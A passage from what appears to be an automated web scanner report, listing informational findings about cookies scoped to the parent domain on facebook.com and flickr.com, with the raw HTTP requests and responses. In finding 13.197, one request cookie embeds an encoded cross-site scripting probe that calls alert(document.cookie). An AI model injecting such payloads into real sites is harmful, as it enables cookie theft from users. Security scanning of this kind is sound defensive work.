Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=Tpmq1; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:15:00 GMT
Content-Length: 155797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

13.194. http://www.facebook.com/abid.bahloul

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /abid.bahloul

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • lsd=6G7wO; path=/; domain=.facebook.com
  • reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fabid.bahloul; path=/; domain=.facebook.com
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fabid.bahloul; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /abid.bahloul HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=6G7wO; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fabid.bahloul; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fabid.bahloul; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:15:02 GMT
Content-Length: 15128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

13.195. http://www.facebook.com/apps/application.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /apps/application.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • lsd=AGZLa; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /apps/application.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=AGZLa; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:12 GMT
Content-Length: 0


13.196. http://www.facebook.com/beirutcityguide

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /beirutcityguide

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • lsd=oJmQq; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /beirutcityguide HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=oJmQq; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:15:02 GMT
Content-Length: 156507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

13.197. http://www.facebook.com/campaign/impression.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/impression.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS; expires=Wed, 23-Feb-2011 21:55:22 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/impression.php?campaign_id=137675572948107&partner_id=www1.whdh.com&placement=like_button&extra_1=http%3A%2F%2Fwww1.whdh.com%2Fnews%2Farticles%2Flocal%2F12003359267921%2Fcommuter-rail-service-updates-for-jan-24%2F&extra_2=US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/&layout=standard&show-faces=true&width=450&action=recommend&colorscheme=light
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252Fcustom%252Fterm%252Fhealth_beauty9c672%252522%25253E%25253Cimg%252520src%25253da%252520onerror%25253dalert%2528document.cookie%2529%25253Ebcac4069246%252F576%26extra_2%3DUS; wd=300x250

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 43
Content-Type: image/gif
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS; expires=Wed, 23-Feb-2011 21:55:22 GMT; path=/; domain=.facebook.com; httponly
X-Cnection: close
Date: Mon, 24 Jan 2011 21:55:22 GMT

GIF89a.............!.......,...........D..;

13.198. http://www.facebook.com/campaign/landing.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/landing.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • campaign_click_url=%2Fcampaign%2Flanding.php; expires=Thu, 24-Feb-2011 00:01:54 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Thu, 24-Feb-2011 00:01:54 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:01:54 GMT
Content-Length: 0


13.199. http://www.facebook.com/home.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /home.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • lsd=isGBp; path=/; domain=.facebook.com
  • next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
  • next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=isGBp; path=/; domain=.facebook.com
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:14:57 GMT
Content-Length: 0


13.200. http://www.facebook.com/miofeghali

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /miofeghali

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • lsd=eDdkX; path=/; domain=.facebook.com
  • reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fmiofeghali; path=/; domain=.facebook.com
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmiofeghali; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /miofeghali HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=eDdkX; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fmiofeghali; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmiofeghali; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:26 GMT
Content-Length: 15117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

13.201. http://www.facebook.com/pages/Traverse-City-MI/CloudAccessnet/116931806748

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Traverse-City-MI/CloudAccessnet/116931806748

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • lsd=Q5Jew; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/Traverse-City-MI/CloudAccessnet/116931806748 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/pages/CloudAccessnet/116931806748
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=Q5Jew; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:09 GMT
Content-Length: 0


13.202. http://www.facebook.com/paty.kfoury

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /paty.kfoury

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • lsd=qOxUt; path=/; domain=.facebook.com
  • reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpaty.kfoury; path=/; domain=.facebook.com
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpaty.kfoury; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /paty.kfoury HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=qOxUt; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpaty.kfoury; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpaty.kfoury; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:20 GMT
Content-Length: 15074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

13.203. http://www.facebook.com/profile.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /profile.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • lsd=1Nf86; path=/; domain=.facebook.com
  • reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D836605415; path=/; domain=.facebook.com
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D836605415; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile.php?id=836605415 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=1Nf86; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D836605415; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D836605415; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:20 GMT
Content-Length: 15196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

13.204. http://www.facebook.com/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • lsd=2yleE; path=/; domain=.facebook.com
  • reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=2yleE; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:01:04 GMT
Content-Length: 10902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

13.205. http://www.flickr.com/photos/aubalumni/4688630122/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/aubalumni/4688630122/x22

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • BX=cvj761d6jr9eq&b=3&s=q9; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
  • localization=en-us%3Bus%3Bus; expires=Thu, 23-Jan-2014 16:16:26 GMT; path=/; domain=.flickr.com
  • cookie_l10n=deleted; expires=Sun, 24-Jan-2010 16:16:25 GMT; path=/; domain=flickr.com
  • cookie_intl=deleted; expires=Sun, 24-Jan-2010 16:16:25 GMT; path=/; domain=flickr.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/aubalumni/4688630122/x22 HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 16:16:26 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=cvj761d6jr9eq&b=3&s=q9; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Thu, 23-Jan-2014 16:16:26 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Sun, 24-Jan-2010 16:16:25 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Sun, 24-Jan-2010 16:16:25 GMT; path=/; domain=flickr.com
X-Served-By: www121.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>
   <title>Flickr: Page Not Found</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

...[SNIP]...

13.206. http://www.flickr.com/photos/favoritltd/4795390303/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/favoritltd/4795390303/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:12 GMT; path=/; domain=.flickr.com
  • cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:11 GMT; path=/; domain=flickr.com
  • cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:11 GMT; path=/; domain=flickr.com
  • fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:12 GMT; path=/; domain=.flickr.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/favoritltd/4795390303/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:12:12 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:12 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:11 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:11 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:12 GMT; path=/; domain=.flickr.com
X-Served-By: www53.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89342

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

   <title>2010-02-23 18.36.45 | Flickr
...[SNIP]...

13.207. http://www.flickr.com/photos/favoritltd/4795390991/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/favoritltd/4795390991/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:10 GMT; path=/; domain=.flickr.com
